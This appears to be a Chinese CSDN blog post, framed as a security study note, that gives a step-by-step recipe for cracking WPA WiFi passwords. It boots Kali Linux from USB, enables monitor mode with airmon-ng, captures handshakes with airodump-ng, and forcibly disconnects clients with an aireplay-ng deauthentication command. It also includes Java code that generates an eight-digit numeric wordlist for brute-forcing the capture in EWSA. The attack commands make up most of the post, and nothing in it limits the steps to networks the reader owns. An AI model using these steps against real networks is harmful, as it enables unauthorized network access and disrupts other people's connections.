记录一次简单的网络安全学习

已于 2022-12-29 11:30:07 修改
阅读量333 收藏 2
点赞数 3
分类专栏: 笔记 文章标签: 网络 linux 运维
于 2022-12-29 11:25:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gfdr5/article/details/128477941
版权

使用U盘安装kali Linux,对无线网络密码进行攻击的步骤:

1、安装kali 到U盘上,下载live版本

在这里插入图片描述在这里插入图片描述

2、使用rufus将U盘格式化,将kali系统刷入U盘

在这里插入图片描述
安装完成后点击确定,不要格式化U盘,将电脑重启。我的电脑是联想拯救者,开机按下fn+f12,进入boot启动菜单,选择U盘启动。

3、开机后成功进入kali启动菜单页面。默认选择第一个启动(直接按回车),进入桌面。

4、启动命令行窗口。

1、输入sudo su,进入root模式。
2、使用airmon-ng命令。
无线网卡设备名称默认wlan0,输入airmon-ng start wlan0启动网卡的监听模式;
3、输入ifconfig,查看网卡的名称是否变化。如果进入失败,需要杀死占用网卡的进程(kali会给出提示);
4、输入airodump-ng wlan0mon打开监听。屏幕上显示监听到的路由器bssid mac地址,信道ch,验证方式auth,essid名称等信息。

下面一部分是路由器mac在这里插入图片描述
与链接他的无线设备(station)的mac,可以记录一下。
5、选择data数据变化快的无线网络,记录bssid。
6、另开一个终端开始攻击。获取管理员权限,输入

airodump-ng  -c “被攻击热点的信道” --bssid “被攻击网络bssid” -w “这里写保存位置,写文件路径” wlan0mon

等待设备连接,连接时会发送握手信号,此时握手包捕获成功。

若一直没有新设备链接,可以使用以下命令:

aireplay-ng -0 0 -a “路由器设备mac地址” -c “链接的设备mac” wlan0mon

强制让设备断开连接,这样重新连接时可以抓到握手包。

5、转回Windows,使用ewsa软件简单破解。

1、生成字典文件,以8位数的纯数字为例,利用Java生成。

// An highlighted block
import java.io.BufferedWriter;
import java.io.FileWriter;
import java.io.IOException;

public class Main {
  public static void main(String[] args) {
    try {
      
      FileWriter fileWriter = new FileWriter("numbers.txt");
      
      BufferedWriter bufferedWriter = new BufferedWriter(fileWriter);

     
      for (int i = 0; i <= 99999999; i++) {
      	//从00000000到99999999,包括八位数的所有密码
     
        String str = String.format("%08d", i);
        
        bufferedWriter.write(str);
        bufferedWriter.newLine();
      }

      // BufferedWriter
      bufferedWriter.close();
    } catch (IOException e) {
      e.printStackTrace();
    }
  }
}

2、打开ewsa,选择导入数据,选第一个tcpdump,选择之前抓到的数据包,一般以.cap为后缀名。
在这里插入图片描述
在这里插入图片描述
选择“关闭变换”,提高破解速度。
在这里插入图片描述
点击“开始破解”,“密码破解”,耐心等待破解完成,如果设置了八位数数字密码,一定可以拿到。
在这里插入图片描述

gfdr5
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
无线WiFi安全渗透与攻防(十三)之WPA破解-windows下GPU包加速
m0_61869253的博客
04-14 1384
一个非常不错的网络网络破解工具,可以直接破解握手包,xp系统下速度非常快。EWSA全称Elcomsoft Wireless SecurityAuditor。号称可以利用GPU的运算性能快速攻破无线网络密码,运算速度相比使用CPU可提高最多上百倍。本软件的工作方式很简单,就是利用词典去暴力找回无线AP上的WPA和WPA2密码,还支持字母大小写、数字替代、符号顺序变换、缩写、元音替换等12种变量设定,在ATI和NVIDIA显卡上均可使用。使用该软件前要事先抓好WPA握手包。
网络安全学习记录-10
Leewy0326的博客
03-05 4592
数据库注入 1.Mysql 注入-Dns 注入 注入没有回显: DNS 注入-》让盲注变成显错注入 Load_File()读取文件 UNC路径 windows SMB 服务(共享文件)//desktop/529 SMB 服务因为他是请求共享文件 所以会发起数据包 load_File()支持unc路径 DNS日志: 记录某时某分谁请求我查某域名 搭建一个DNS服务器来承接域名解析,所有访问域名都会被记录 域名本身运营商解析,修改域名设置方法,强行执行某个IP去解析域名 DNS注入平台 d
网络安全学习记录-12
Leewy0326的博客
03-12 518
越权-普通用户居然也饿能登录后台 越权:一个低权限用户可以进行高权限操作或者平级操作(用户A 修改用户B密码 网站网页 App 为主) 提权:指的是低权限用户通过技术手段提升到高权限(指的是计算机权限 用户权限-》管理权限) SQL注入 XSS CSRF 文件上传都是代码方面有问题(不需要人也可以测) 漏扫:企业级漏洞扫描工具 awvs/极光 逻辑安全漏洞:程序设计思路有问题, 水平越权:同权限账户可以互相影响(A B) 垂直越权:不同权限的账户可以互相影响(A B 可以影响管理员) 交叉越
网络安全学习笔记(一)
的博客
08-10 2175
入侵步骤**阶段一:搜索**​1、互联网搜索​2、社会工程学​3、垃圾数据搜寻​4、域名信息收集​注册人、注册邮箱​5、非入侵性的网络扫描​不违法,不危害他人计算机安全​**阶段2:扫描**​1、每一台局域网、广域网设备的品牌型号​2、开发的端口及应用服务​不如4439 3389 8080 等端口 阿帕奇等应用​3、操作系统内在的漏洞​看其系统有没有即使打补丁​4、保护性交叉的数据传输​**阶段三:获得权限**​。......
网络安全学习笔记(适合初学者)
cnds123的专栏
03-27 2285
网络安全学习笔记 一、 Ip欺骗(IP spoof)及防范原则 IP[地址]欺骗被用来从事非法活动,破坏网络安全,黑客使用IP欺骗就不会被抓到,还有一些黑客进行Dos攻击的时候,就可以隐藏真实的IP,这样攻击者就无法查到。IP欺骗有时候也可以用来被克隆某个内部网中的信息,这样有时候就可以避免开户名和密码验证而直接登录系统。 TCP中的SYN、RST、FIN中 含义 在TCP报文的报头...
网络安全学习笔记(6)
qq_40316844的博客
09-11 263
这章学习的主要内容是PE结构以及用C语言编写PE结构解析器。 首先学习PE结构: E_lfanew:文件的偏移0x3C(第60字节)处是是一个4字节的PE文件签名的偏移地址。 参数的末尾也就是文件的偏移0x3C(第60字节) //注释掉的不需要重点分析 1、DOS头:共40H(64字节) struct _IMAGE_DOS_HEADER{ 0X00 WORD e_magic; //※Ma...
2022年网络安全工程师考试学习资料.doc
11-20
"2022年网络安全工程师考试学习资料.doc" 本学习资料旨在帮助考生掌握网络安全工程师考试所需的知识点。以下是对标题、描述、标签和部分内容的解释和知识点总结: 1. 安全风险描述:安全风险是指一种特定脆弱性被...
网络安全-Diffie Hellman密钥协商
最新发布
04-24
Diffie-Hellman密钥协商协议是网络安全领域中一个至关重要的概念,它是公钥基础设施(PKI)中非对称加密技术的一种应用。这个协议由Whitfield Diffie和Martin Hellman在1976年提,为互联网上的安全通信奠定了基础...
小学生网络安全宣传教育PPT课件.pptx
08-12
网络安全是当今社会中一个至关重要的主题,尤其是在教育领域,尤其是对于小学生来说,他们正在学习如何在数字世界中导航。这份“小学生网络安全宣传教育PPT课件”旨在帮助小学生了解网络安全的基本知识,保护他们免...
关于PLC安全的一次实验1
08-03
Snort是一款流行的开源网络入侵检测系统,它基于规则匹配来检测违反安全策略的网络流量。Snort包含了协议分析器、入侵检测引擎、日志记录和报警组件,能够实时报警并记录网络活动。其小巧、易安装、易配置和可扩展的...
Beini抓取握手包&导握手包到破解成功图文.doc
07-30
Beini抓取握手包&导握手包到破解成功图文
信息安全TS-web学习资料
07-18
实战部分可能包含CTF(Capture The Flag,夺旗赛)题目,这是一种常见的网络安全竞赛形式,通过解决实际安全问题来提升技能。 4. **测试题目**:这部分可能包含了一些模拟题或真实案例,用于检验学习者对Web安全...
网络安全等级保护学习记录--法律依据、定级指南
Leonardo的博客
07-29 6978
信息安全等级保护的要求 PART I  法律依据 1、网络安全等级保护开展的法律依据          2017.6.1正式实施的《网络安全法》(2016.11.7) 第二十一条 国家实行网络安全等级保护制度。网络运营者应当按照网络安全等级保护制度的要求,履行下列安全保护义务,保障网络免受干扰、破坏或者未经授权的访问,防止网络数据泄露或者被窃取、篡改: (一)制定内部安全管理制度和操作规...
kali使用aircrack无线攻击wifi超详细步骤(包含监听网卡启动,获得握手包,密码本生成)
m0_50818626的博客
04-17 1万+
平台及工具: linuxkali平台 aircrack - ng 工具 免驱监听网卡 详细操作 1.首先启动kali,插入网卡,输入ifconfig查看kali是否检测到监听网卡,注意监听网卡要免驱动的。 ifconfig //查看自身网卡信息 如图,看到wlan0就代表kali成功检测到监听网卡啦。 2.在启动网卡的监听模式之前一定要杀死进程,否则将会监听不到附近的WiFi,执行下面命令杀死进程。 airmon-ng check kill //杀死有关进程 3
KALI - 暴破wifi之抓取握手
热门推荐
lingmessy的博客
08-13 2万+
KALI - 暴破wifi之抓取握手包 提示:要有外置的 支持 kali 的 usb 无线网卡,虚拟机要把vmware的usb服务和网卡启用。 1.查看网卡信息 sudo airairmon-ng 或者 sudo ifconfig 2.开启监听模式 sudo airmon-ng start wlan0 执行成功之后网卡接口变为wlan0mon,可以继续用步骤1的方法查看。 3.扫描wifi sudo airodump-ng wlan0mon 然后会自动扫描列附近wifi 记下目标wifi的频
无线渗透学习笔记使用kali系统抓握手包以及字典相关
情随事迁个人博客
12-17 9529
D4:EE:07:59:CE:70 -33 5 1 0 8 130 WPA2 CCMP PSK CMCC-1024 EC:41:18:28:03:40 -66 5 0 0 6 130 WPA2 CCMP PSK Xiaomi_033F 当前网卡 Curr.
Kal系统学习记录一次wifi破解过程
weixin_55772224的博客
04-08 3074
Kali系统学习记录一次wifi破解过程 这是一个小白写的一篇很刑的文章,用于记录一次学习过程,希望能给刚刚入门学习kali系统,迫不及待的你一点小小的鼓励
将虚拟机中文件移动到windows的方法
qq_40947291的博客
01-23 3308
1.使用ifconfig查看虚拟机IP地址。会查找来两个地址,第一个为虚拟机真实地址,第二个为虚拟地址,使用第一个地址。 2.设置网络为桥接网络。这样虚拟机会被分配一个网卡,和windows的网卡同等级。若选择“网络地址转换NAT”,则虚拟机下的网卡为win下的网卡。 3.在Ubuntu启用ssh远程服务: 闪烁 参考连接: 在Virtual Box上安装linux系统,启动SSH服务 - Waaaaaall-E - 博客园 3.闪烁windows power shell,运行 .
抓包握手
weixin_51017074的博客
11-29 1885
抓包

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值